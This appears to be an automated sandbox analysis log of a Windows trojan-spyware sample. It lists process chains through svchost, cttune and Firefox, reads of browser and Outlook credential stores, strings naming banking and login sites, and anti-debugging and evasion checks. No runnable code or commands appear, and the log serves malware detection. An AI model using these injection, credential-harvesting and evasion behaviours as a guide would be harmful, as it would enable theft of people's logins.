Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_046477B5
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0463F001
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_046459AC
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_046459B1
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0463F221
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0463D231
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0463D378
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0463D381
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 283 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 109 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
Source: C:\Users\user\Desktop\new.exe | Code function: String function: 00BC7DE1 appears 35 times
Source: C:\Users\user\Desktop\new.exe | Code function: String function: 00BE8900 appears 42 times
Source: C:\Users\user\Desktop\new.exe | Code function: String function: 00BE0AE3 appears 70 times
Source: new.exe, 00000005.00000003.1305565248.00000000036ED000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new.exe
Source: new.exe, 00000005.00000003.1306768500.0000000003543000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new.exe
Source: new.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/4
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C181CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C3EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BC4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\new.exe | File created: C:\Users\user\AppData\Local\Temp\aut6DEF.tmp
Source: new.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\new.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cttune.exe, 0000000A.00000002.2530495496.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.2076964586.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.00000000030F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: new.exe | ReversingLabs: Detection: 44%
Source: unknown | Process created: C:\Users\user\Desktop\new.exe "C:\Users\user\Desktop\new.exe"
Source: C:\Users\user\Desktop\new.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\new.exe"
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
Source: C:\Windows\SysWOW64\cttune.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\new.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\new.exe"Jump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: new.exe | Static file information: File size 1208832 > 1048576
                Source: new.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: new.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: new.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: new.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: new.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: new.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: new.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: cttune.pdb source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lxdvPfMVsD.exe, 00000009.00000000.1792072950.000000000075E000.00000002.00000001.01000000.00000005.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2530028871.000000000075E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: new.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: new.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: new.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: new.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: new.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BC4B37 LoadLibraryA,GetProcAddress, 5_2_00BC4B37
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE8945 push ecx; ret 5_2_00BE8958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004178CA push edx; iretd 7_2_004178CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004150EB push esp; iretd 7_2_0041514F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040D8B6 push ecx; ret 7_2_0040D8B7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00415119 push esp; iretd 7_2_0041514F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00424A53 push 3D550B4Fh; ret 7_2_00424A6B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00417A3B push ebx; iretd 7_2_00417A3C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00423D13 push edi; retf 7_2_00423D1E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040AEDA push FFFFFF84h; retf 7_2_0040AEDC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004036A0 push eax; ret 7_2_004036A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034309AD push ecx; mov dword ptr [esp], ecx 7_2_034309B6
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_046464C9 push ebx; iretd 9_2_046464CA
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_04639968 push FFFFFF84h; retf 9_2_0463996A
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_04643B79 push esp; iretd 9_2_04643BDD
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0463C344 push ecx; ret 9_2_0463C345
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_04646358 push edx; iretd 9_2_0464635B
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_04643BA7 push esp; iretd 9_2_04643BDD
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00BC48D7
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C45376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_00C45376
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00BE3187
                Source: C:\Users\user\Desktop\new.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\new.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cttune.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cttune.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cttune.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cttune.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cttune.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\new.exe | API/Special instruction interceptor: Address: F5D224
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\cttune.exe | API/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0347096E rdtsc 7_2_0347096E
                Source: C:\Users\user\Desktop\new.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_5-105478
                Source: C:\Users\user\Desktop\new.exe | API coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\cttune.exe TID: 7724 | Thread sleep count: 52 > 30
                Source: C:\Windows\SysWOW64\cttune.exe TID: 7724 | Thread sleep time: -104000s >= -30000s
                Source: C:\Windows\SysWOW64\cttune.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\cttune.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2445A GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00C2445A
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2C6D1 FindFirstFileW,FindClose, 5_2_00C2C6D1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00C2C75C
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00C2EF95
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00C2F0F2
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C2F3F3
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C237EF
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C23B12
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C2BCBC
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00BC49A0
                Source: --cG1-69-.10.dr | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: --cG1-69-.10.dr | Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: --cG1-69-.10.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                Source: --cG1-69-.10.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: --cG1-69-.10.dr | Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: --cG1-69-.10.dr | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: --cG1-69-.10.dr | Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: --cG1-69-.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: --cG1-69-.10.dr | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: --cG1-69-.10.dr | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: lxdvPfMVsD.exe, 0000000D.00000002.2531431973.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: --cG1-69-.10.dr | Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: --cG1-69-.10.dr | Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: --cG1-69-.10.dr | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: --cG1-69-.10.dr | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: --cG1-69-.10.dr | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: --cG1-69-.10.dr | Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: --cG1-69-.10.dr | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: --cG1-69-.10.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: --cG1-69-.10.dr | Binary or memory string: global block list test formVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: --cG1-69-.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: --cG1-69-.10.dr | Binary or memory string: interactiveuserers.comVMware20,11696501413
                Source: --cG1-69-.10.dr | Binary or memory string: discord.comVMware20,11696501413f
                Source: --cG1-69-.10.dr | Binary or memory string: AMC password management pageVMware20,11696501413
                Source: firefox.exe, 0000000F.00000002.2187886064.000001A96935C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDD
                Source: C:\Users\user\Desktop\new.exe | API call chain: ExitProcess graph end node graph_5-104288
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\cttune.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0347096E rdtsc 7_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00417EB3 LdrLoadDll, 7_2_00417EB3
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C33F09 BlockInput, 5_2_00C33F09
